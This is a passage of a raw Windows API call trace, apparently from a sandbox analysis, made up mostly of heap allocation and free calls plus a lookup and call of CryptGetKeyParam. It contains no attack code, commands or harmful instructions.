returned 1 [0178.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0178.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.134] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0178.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0178.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0178.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0178.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0178.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0178.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0178.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0178.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0178.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0178.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0178.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0178.135] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0178.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0178.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0178.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0178.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0178.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0178.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0178.136] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0178.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0178.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd420 [0178.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0178.136] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0178.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0178.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0178.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0178.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0178.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0178.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0178.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0178.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0178.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0178.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0178.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0178.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0178.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0178.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0178.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0178.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0178.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0178.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0178.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0178.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0178.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0178.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0178.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0178.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0178.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0178.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0178.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0178.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0178.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0178.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0178.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0178.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0178.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0178.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0178.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0178.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0178.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0178.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0178.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0178.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0178.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0178.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0178.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0178.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0178.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0178.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0178.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0178.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0178.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0178.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0178.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0178.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0178.140] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0178.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0178.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0178.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0178.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0178.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0178.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0178.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0178.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0178.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0178.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0178.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0178.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0178.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0178.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0178.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0178.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0178.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0178.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0178.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0178.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0178.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.141] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0178.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0178.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0178.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0178.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0178.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0178.142] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c27a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0178.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0178.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 